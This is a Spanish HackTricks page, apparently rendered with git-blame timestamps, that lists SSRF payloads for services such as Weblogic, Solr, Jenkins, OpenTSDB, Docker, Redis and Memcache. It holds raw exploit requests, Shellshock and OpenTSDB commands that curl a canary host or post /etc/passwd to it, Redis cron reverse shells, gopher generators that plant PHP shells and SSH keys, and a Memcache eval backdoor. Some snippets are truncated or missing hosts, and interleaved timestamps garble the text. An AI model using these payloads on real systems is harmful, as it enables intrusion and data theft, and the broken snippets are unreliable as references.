2023-07-13 10:24:09 +00:00
# Plataformas Vulnerables a SSRF
2023-06-05 20:33:24 +02:00
< details >
2024-01-01 18:33:30 +00:00
< summary > < strong > Aprende hacking en AWS de cero a héroe con< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Otras formas de apoyar a HackTricks:
* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** , consulta los [**PLANES DE SUSCRIPCIÓN** ](https://github.com/sponsors/carlospolop )!
* Consigue el [**merchandising oficial de PEASS & HackTricks** ](https://peass.creator-spring.com )
* Descubre [**La Familia PEASS** ](https://opensea.io/collection/the-peass-family ), nuestra colección de [**NFTs** ](https://opensea.io/collection/the-peass-family ) exclusivos
* **Únete al** 💬 [**grupo de Discord** ](https://discord.gg/hRep4RUj7f ) o al [**grupo de telegram** ](https://t.me/peass ) o **sigue** a **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github de** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) y [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2023-06-05 20:33:24 +02:00
< / details >
Esta sección fue copiada de [https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/ ](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/ )
2023-07-13 10:24:09 +00:00
## Elasticsearch
2023-06-05 20:33:24 +02:00
**Puerto comúnmente utilizado: 9200**
2023-07-13 10:24:09 +00:00
Cuando Elasticsearch se implementa internamente, generalmente no requiere autenticación.
2023-06-05 20:33:24 +02:00
Si tienes un SSRF parcialmente ciego donde puedes determinar el código de estado, verifica si los siguientes endpoints devuelven un 200:
2024-01-01 18:33:30 +00:00
Si tienes un SSRF ciego donde puedes enviar solicitudes POST, puedes cerrar la instancia de Elasticsearch enviando una solicitud POST al siguiente camino:
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Nota: la API `_shutdown` ha sido eliminada de la versión 2.x. de Elasticsearch en adelante. Esto solo funciona en Elasticsearch 1.6 y versiones anteriores:
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
## Weblogic
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 80, 443 (SSL), 7001, 8888**
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**SSRF Canary: UDDI Explorer (CVE-2014-4210)**
2023-06-05 20:33:24 +02:00
POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
Host: target.com
Content-Length: 137
Content-Type: application/x-www-form-urlencoded
operator=http%3A%2F%2FSSRF_CANARY& rdoSearch=name& txtSearchname=test& txtSearchkey=& txtSearchfor=& selfor=Business+location& btnSubmit=Search
Esto también funciona a través de GET:
http://target.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2FSSRF_CANARY& rdoSearch=name& txtSearchname=test& txtSearchkey=& txtSearchfor=& selfor=Business+location& btnSubmit=Search
2024-01-01 18:33:30 +00:00
Este endpoint también es vulnerable a la inyección CRLF:
2023-06-05 20:33:24 +02:00
GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://attacker.com:4000/exp%20HTTP/1.11%0AX-CLRF%3A%20Injected%0A& rdoSearch=name& txtSearchname=sdf& txtSearchkey=& txtSearchfor=& selfor=Business+location& btnSubmit=Search HTTP/1.0
Host: vuln.weblogic
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Connection: close
Resultará en la siguiente solicitud:
root@mail: ~# nc -lvp 4000
Listening on [] (family 0, port 4000)
Connection from example.com 43111 received!
POST /exp HTTP/1.11
X-CLRF: Injected HTTP/1.1
Content-Type: text/xml; charset=UTF-8
soapAction: ""
Content-Length: 418
User-Agent: Java1.6.0_24
Host: attacker.com:4000
Accept: text/html, image/gif, image/jpeg, */* ; q=.2
Connection: Keep-Alive
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> < env:Envelope xmlns:soapenc = "http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd = "http://www.w3.org/2001/XMLSchema" xmlns:env = "http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi = "http://www.w3.org/2001/XMLSchema-instance" > < env:Header / > < env:Body > < find_business generic = "2.0" xmlns = "urn:uddi-org:api_v2" > < name > sdf< / name > < / find_business > < / env:Body > < / env:Envelope >
**SSRF Canary: CVE-2020-14883**
Tomado de [aquí ](https://forum.90sec.com/t/topic/1412 ).
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
_nfpb=true& _pageLabel=& handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://SSRF_CANARY/poc.xml")
2024-01-01 18:33:30 +00:00
2023-06-05 20:33:24 +02:00
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
_nfpb=true& _pageLabel=& handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml")
2023-07-13 10:24:09 +00:00
## Hashicorp Consul
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 8500, 8501 (SSL)**
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Puedes encontrar el artículo [aquí ](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html ).
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
## Shellshock
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 80, 443 (SSL), 8080**
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Para probar efectivamente Shellshock, puede ser necesario agregar un encabezado que contenga el payload. Los siguientes caminos CGI son recomendables para probar:
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Lista corta de caminos CGI para probar:
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
[Gist con los caminos ](https://gist.github.com/infosec-au/009fcbdd5bad16bb6ceb36b838d96be4 ).
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**SSRF Canary: Shellshock a través de User Agent**
2023-06-05 20:33:24 +02:00
User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; curl SSRF_CANARY
2023-07-13 10:24:09 +00:00
## Apache Druid
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 80, 8080, 8888, 8082**
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Consulta la referencia de la API para Apache Druid [aquí ](https://druid.apache.org/docs/latest/operations/api-reference.html ).
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Si puedes ver el código de estado, verifica las siguientes rutas para ver si devuelven un código de estado 200:
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Tareas de apagado, requiere que adivines los ID de tareas o el nombre del origen de datos:
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Supervisores de apagado en Apache Druid Overlords:
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
## Apache Solr
2023-06-05 20:33:24 +02:00
**Puerto comúnmente utilizado: 8983**
**SSRF Canary: Parámetro Shards**
2024-01-01 18:33:30 +00:00
> Para añadir a lo que shubham está diciendo - escanear solr es relativamente fácil. Hay un parámetro shards= que te permite rebotar SSRF a SSRF para verificar que estás impactando una instancia de solr a ciegas.
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
> — Хавиж Наффи 🥕 (@nnwakelam) [13 de enero de 2021](https://twitter.com/nnwakelam/status/1349298311853821956?ref_src=twsrc%5Etfw)
2023-06-05 20:33:24 +02:00
Tomado de [aquí ](https://github.com/veracode-research/solr-injection ).
/search?q=Apple& shards=http://SSRF_CANARY/solr/collection/config%23& stream.body={"set-property":{"xxx":"yyy"}}
/solr/db/select?q=orange& shards=http://SSRF_CANARY/solr/atom& qt=/select?fl=id,name:author& wt=json
2023-07-13 10:24:09 +00:00
2023-06-05 20:33:24 +02:00
/xxx?q=aaa& shards=http://SSRF_CANARY/solr
**SSRF Canary: Solr XXE (2017)**
[Apache Solr 7.0.1 XXE (Packetstorm) ](https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html )
/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://SSRF_CANARY/xxx"'> < a > < / a > '
/xxx?q={!type=xmlparser v="<!DOCTYPE a SYSTEM 'http://SSRF_CANARY/solr'> < a > < / a > "}
**RCE a través de dataImportHandler**
[Investigación sobre RCE a través de dataImportHandler ](https://github.com/veracode-research/solr-injection#3-cve-2019-0193-remote-code-execution-via-dataimporthandler )
2023-07-13 10:24:09 +00:00
## PeopleSoft
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 80,443 (SSL)**
2023-06-05 20:33:24 +02:00
Tomado de esta investigación [aquí ](https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce ).
**SSRF Canary: XXE #1 **
POST /PSIGW/HttpListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
<?xml version="1.0"?>
< !DOCTYPE IBRequest [
< IBRequest >
2023-07-13 10:24:09 +00:00
< ExternalOperationName > &x; < / ExternalOperationName >
< OperationType / >
< From > < RequestingNode / >
< Password / >
< OrigUser / >
< OrigNode / >
< OrigProcess / >
< OrigTimeStamp / >
< / From >
< To >
< FinalDestination / >
< DestinationNode / >
< SubChannel / >
< / To >
< ContentSections >
< ContentSection >
< NonRepudiation / >
< MessageVersion / >
< Data > <![CDATA[<?xml version="1.0"?>your_message_content]]>
< / Data >
< / ContentSection >
< / ContentSections >
2023-06-05 20:33:24 +02:00
< / IBRequest >
2024-01-01 18:33:30 +00:00
**SSRF Canary: XXE #2 **
2023-06-05 20:33:24 +02:00
POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
2023-07-13 10:24:09 +00:00
## Apache Struts
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comunes: 80,443 (SSL),8080,8443 (SSL)**
2023-06-05 20:33:24 +02:00
Tomado de [aquí ](https://blog.safebuff.com/2016/07/03/SSRF-Tips/ ).
**SSRF Canary: Struts2-016**:
2024-01-01 18:33:30 +00:00
Añade esto al final de cada punto final/interno URL que conozcas:
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
## JBoss
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 80,443 (SSL),8080,8443 (SSL)**
2023-06-05 20:33:24 +02:00
Tomado de [aquí ](https://blog.safebuff.com/2016/07/03/SSRF-Tips/ ).
2024-01-01 18:33:30 +00:00
**SSRF Canary: Desplegar WAR desde URL**
2023-06-05 20:33:24 +02:00
/jmx-console/HtmlAdaptor?action=invokeOp& name=jboss.system:service=MainDeployer& methodIndex=17& arg0=http://SSRF_CANARY/utils/cmd.war
2023-07-13 10:24:09 +00:00
## Confluence
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 80,443 (SSL),8080,8443 (SSL)**
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
**SSRF Canary: Sharelinks (versiones de Confluence lanzadas desde noviembre de 2016 y anteriores)**
2023-06-05 20:33:24 +02:00
**SSRF Canary: iconUriServlet - Confluence < 6.1.3 ( CVE-2017-9506 ) * *
2024-01-01 18:33:30 +00:00
[Ticket de Seguridad de Atlassian OAUTH-344 ](https://ecosystem.atlassian.net/browse/OAUTH-344 )
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
## Jira
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 80,443 (SSL),8080,8443 (SSL)**
2023-06-05 20:33:24 +02:00
**SSRF Canary: iconUriServlet - Jira < 7.3.5 ( CVE-2017-9506 ) * *
2024-01-01 18:33:30 +00:00
[Ticket de Seguridad de Atlassian OAUTH-344 ](https://ecosystem.atlassian.net/browse/OAUTH-344 )
2023-06-05 20:33:24 +02:00
**SSRF Canary: makeRequest - Jira < 8.4.0 ( CVE-2019-8451 ) * *
2024-01-01 18:33:30 +00:00
[Ticket de Seguridad de Atlassian JRASERVER-69793 ](https://jira.atlassian.com/browse/JRASERVER-69793 )
2023-06-05 20:33:24 +02:00
/plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example .com
2024-01-01 18:33:30 +00:00
## Otros Productos de Atlassian
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 80,443 (SSL),8080,8443 (SSL)**
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
**SSRF Canary: iconUriServlet (CVE-2017-9506)**:
2023-06-05 20:33:24 +02:00
* Bamboo < 6.0.0
* Bitbucket < 4.14.4
* Crowd < 2.11.2
* Crucible < 4.3.2
* Fisheye < 4.3.2
2024-01-01 18:33:30 +00:00
[Ticket de Seguridad de Atlassian OAUTH-344 ](https://ecosystem.atlassian.net/browse/OAUTH-344 )
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
## OpenTSDB
2023-06-05 20:33:24 +02:00
**Puerto comúnmente utilizado: 4242**
2023-07-13 10:24:09 +00:00
[OpenTSDB Ejecución Remota de Código ](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html )
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**SSRF Canary: curl vía RCE**
2023-06-05 20:33:24 +02:00
/q?start=2016/04/13-10:21:00& ignore=2& m=sum:jmxdata.cpu& o=& yrange=[0:]& key=out%20right%20top& wxh=1900x770%60curl%20SSRF_CANARY%60& style=linespoint& png
2024-01-01 18:33:30 +00:00
[OpenTSDB 2.4.0 Ejecución de Código Remoto ](https://github.com/OpenTSDB/opentsdb/issues/2051 )
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**SSRF Canary: curl vía RCE - CVE-2020-35476**
2023-06-05 20:33:24 +02:00
/q?start=2000/10/21-00:00:00& end=2020/10/25-15:56:44& m=sum:sys.cpu.nice& o=& ylabel=& xrange=10:10& yrange=[33:system('wget%20--post-file%20/etc/passwd%20SSRF_CANARY')]& wxh=1516x644& style=linespoint& baba=lala& grid=t& json
2023-07-13 10:24:09 +00:00
## Jenkins
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comunes: 80,443 (SSL),8080,8888**
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Gran artículo [aquí ](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html ).
2023-06-05 20:33:24 +02:00
**SSRF Canary: CVE-2018-1000600**
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://SSRF_CANARY/%23& login=orange& password=tsai
2024-01-01 18:33:30 +00:00
Sigue las instrucciones aquí para lograr RCE a través de GET: [Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE! ](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html )
2023-06-05 20:33:24 +02:00
/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig (disableChecksums=true)%0a@GrabResolver (name='orange.tw', root='http://SSRF_CANARY/')%0a@Grab (group='tw.orange', module='poc', version='1')%0aimport Orange;
**RCE a través de Groovy**
cmd = 'curl burp_collab'
pay = 'public class x {public x(){"%s".execute()}}' % cmd
data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true& value=' + urllib.quote(pay)
2024-01-01 18:33:30 +00:00
## Tablero Hystrix
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 80,443 (SSL),8080**
2023-06-05 20:33:24 +02:00
Spring Cloud Netflix, versiones 2.2.x anteriores a 2.2.4, versiones 2.1.x anteriores a 2.1.6.
2024-01-01 18:33:30 +00:00
**SSRF Canary: CVE-2020-5412**
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
## W3 Total Cache
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 80,443 (SSL)**
2023-06-05 20:33:24 +02:00
W3 Total Cache
2023-07-13 10:24:09 +00:00
**SSRF Canary: CVE-2019-6715**
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Esto necesita ser una solicitud PUT:
2023-06-05 20:33:24 +02:00
PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Connection: close
**SSRF Canary**
2024-01-01 18:33:30 +00:00
El aviso para esta vulnerabilidad se publicó aquí: [Vulnerabilidad SSRF de W3 Total Cache ](https://klikki.fi/adv/w3\_total\_cache.html )
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Este código PHP generará un payload para tu host SSRF Canary (reemplaza `url` con tu host canary):
2023-06-05 20:33:24 +02:00
< ?php
$file=strtr(base64_encode(gzdeflate($url.'#https://ajax .googleapis.com')), '+/=', '-_');
2023-07-13 10:24:09 +00:00
## Docker
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 2375, 2376 (SSL)**
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Si tienes un SSRF parcialmente ciego, puedes usar las siguientes rutas para verificar la presencia de la API de Docker:
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Ejecución de RCE a través de una imagen docker arbitraria**
2023-06-05 20:33:24 +02:00
POST /containers/create?name=test HTTP/1.1
Host: website.com
Content-Type: application/json
{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}
2024-01-01 18:33:30 +00:00
Reemplace alpine con una imagen arbitraria que desee que ejecute el contenedor de docker.
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
## Gitlab Prometheus Redis Exporter
2023-06-05 20:33:24 +02:00
**Puertos comúnmente vinculados: 9121**
2024-01-01 18:33:30 +00:00
Esta vulnerabilidad afecta a instancias de Gitlab antes de la versión 13.1.1. Según la [documentación de Gitlab ](https://docs.gitlab.com/ee/administration/monitoring/prometheus/#configuring-prometheus ) `Prometheus y sus exportadores están activados por defecto, a partir de GitLab 9.0.`
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Estos exportadores proporcionan un excelente método para que un atacante pivote y ataque otros servicios utilizando CVE-2020-13379. Uno de los exportadores que se explota fácilmente es el Redis Exporter.
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
El siguiente punto final permitirá a un atacante volcar todas las claves en el servidor redis proporcionadas a través del parámetro target:
2023-06-05 20:33:24 +02:00
http://localhost:9121/scrape?target=redis:// check-keys=*
2023-10-26 14:33:39 +00:00
2024-01-01 18:33:30 +00:00
**Posible vía Gopher**
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
## Redis
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puerto comúnmente asignado: 6379**
2023-06-05 20:33:24 +02:00
Lectura recomendada:
2024-01-01 18:33:30 +00:00
* [Intentando hackear Redis a través de peticiones HTTP ](https://www.agarri.fr/blog/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html )
* [Explotaciones de SSRF contra Redis ](https://maxchadwick.xyz/blog/ssrf-exploits-against-redis )
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**RCE vía Cron** - [Superficies de Ataque Gopher ](https://blog.chaitin.cn/gopher-attack-surfaces/ )
2023-06-05 20:33:24 +02:00
redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/ 0>& 1\n\n"|redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save
gopher://*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/ 0>& 1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
2024-01-01 18:33:30 +00:00
**RCE mediante carga de Shell (PHP)** - [Resumen de Redis Getshell ](https://www.mdeditor.tw/pl/pBy0 )
2023-06-05 20:33:24 +02:00
#!/usr/bin/env python
# -*-coding:utf-8-*-
import urllib
2023-07-13 10:24:09 +00:00
2023-06-05 20:33:24 +02:00
shell="\n\n<?php phpinfo();?> \n\n"
2023-07-13 10:24:09 +00:00
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
"set 1 {}".format(shell.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
2023-06-05 20:33:24 +02:00
if passwd:
2023-07-13 10:24:09 +00:00
cmd.insert(0,"AUTH {}".format(passwd))
2023-06-05 20:33:24 +02:00
def redis_format(arr):
2023-07-13 10:24:09 +00:00
redis_arr = arr.split(" ")
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
return cmd
2023-06-05 20:33:24 +02:00
if __name__ =="__main__":
2023-07-13 10:24:09 +00:00
for x in cmd:
payload += urllib.quote(redis_format(x))
print payload
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**RCE a través de authorized_keys** - [Resumen de Redis Getshell ](https://www.mdeditor.tw/pl/pBy0 )
2023-06-05 20:33:24 +02:00
import urllib
# shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"
sshpublic_key = "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8IOnJUAt5b/5jDwBDYJTDULjzaqBe2KW3KhqlaY58XveKQRBLrG3ZV0ffPnIW5SLdueunb4HoFKDQ/KPXFzyvVjqByj5688THkq1RJkYxGlgFNgMoPN151zpZ+eCBdFZEf/m8yIb3/7Cp+31s6Q/DvIFif6IjmVRfWXhnkjNehYjsp4gIEBiiW/jWId5yrO9+AwAX4xSabbxuUyu02AQz8wp+h8DZS9itA9m7FyJw8gCrKLEnM7PK/ClEBevDPSR+0YvvYtnUxeCosqp9VrjTfo5q0nNg9JAvPMs+EA1ohUct9UyXbTehr1Bdv4IXx9+7Vhf4/qwle8HKali3feIZ root@kali \n\n"
2023-07-13 10:24:09 +00:00
"set 1 {}".format(sshpublic_key.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
2023-06-05 20:33:24 +02:00
if passwd:
2023-07-13 10:24:09 +00:00
cmd.insert(0,"AUTH {}".format(passwd))
2023-06-05 20:33:24 +02:00
def redis_format(arr):
2023-07-13 10:24:09 +00:00
redis_arr = arr.split(" ")
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
return cmd
2023-06-05 20:33:24 +02:00
if __name__ =="__main__":
2023-07-13 10:24:09 +00:00
for x in cmd:
payload += urllib.quote(redis_format(x))
print payload
2023-06-05 20:33:24 +02:00
**RCE en GitLab a través del protocolo Git**
2023-07-13 10:24:09 +00:00
Excelente artículo de Liveoverflow [aquí ](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ ).
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Aunque esto requería acceso autenticado a GitLab para explotar, incluyo el payload aquí ya que el protocolo `git` podría funcionar en el objetivo que estás hackeando. Este payload es para referencia.
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
## Memcache
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puerto comúnmente asignado: 11211**
2023-06-05 20:33:24 +02:00
* [vBulletin Memcache RCE ](https://www.exploit-db.com/exploits/37815 )
* [GitHub Enterprise Memcache RCE ](https://www.exploit-db.com/exploits/42392 )
2024-01-01 18:33:30 +00:00
* [Ejemplo de payload Gopher para Memcache ](https://blog.safebuff.com/2016/07/03/SSRF-Tips/#SSRF-memcache-Getshell )
2023-06-05 20:33:24 +02:00
gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a
gopher:// ssrftest%0d%0a
2023-07-13 10:24:09 +00:00
## Apache Tomcat
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 80,443 (SSL),8080,8443 (SSL)**
2023-06-05 20:33:24 +02:00
Efectivo solo contra Tomcat 6:
[gopher-tomcat-deployer ](https://github.com/pimps/gopher-tomcat-deployer )
2024-01-01 18:33:30 +00:00
Writeup de CTF utilizando esta técnica:
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
[De XXE a RCE: Pwn2Win CTF 2018 Writeup ](https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/ )
2023-06-05 20:33:24 +02:00
2023-07-13 10:24:09 +00:00
## FastCGI
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 80,443 (SSL)**
2023-06-05 20:33:24 +02:00
Esto fue tomado de [aquí ](https://blog.chaitin.cn/gopher-attack-surfaces/ ).
2023-07-13 10:24:09 +00:00
## Java RMI
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
**Puertos comúnmente asignados: 1090,1098,1099,1199,4443-4446,8999-9010,9999**
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
Vulnerabilidades de _SSRF_ ciegas que permiten bytes arbitrarios (_basados en gopher_) pueden ser utilizadas para realizar ataques de deserialización o de base de código en los componentes predeterminados de _Java RMI_ (_RMI Registry_, _Distributed Garbage Collector_ , _Activation System_ ). Un artículo detallado se puede encontrar [aquí ](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/ ). La siguiente lista muestra un ejemplo para la generación del payload:
2023-06-05 20:33:24 +02:00
$ rmg serial 1090 CommonsCollections6 'curl example.burpcollaborator.net' --component reg --ssrf --gopher
[+] Creating ysoserial payload... done.
[+] Attempting deserialization attack on RMI Registry endpoint...
[+] SSRF Payload: gopher://[...]
< details >
2024-01-01 18:33:30 +00:00
< summary > < strong > Aprende hacking en AWS de cero a héroe con< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
Otras formas de apoyar a HackTricks:
2023-06-05 20:33:24 +02:00
2024-01-01 18:33:30 +00:00
* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** revisa los [**PLANES DE SUSCRIPCIÓN** ](https://github.com/sponsors/carlospolop )!
* Consigue el [**merchandising oficial de PEASS & HackTricks** ](https://peass.creator-spring.com )
* Descubre [**La Familia PEASS** ](https://opensea.io/collection/the-peass-family ), nuestra colección de [**NFTs** ](https://opensea.io/collection/the-peass-family ) exclusivos
* **Únete al** 💬 [**grupo de Discord** ](https://discord.gg/hRep4RUj7f ) o al [**grupo de telegram** ](https://t.me/peass ) o **sígueme** en **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
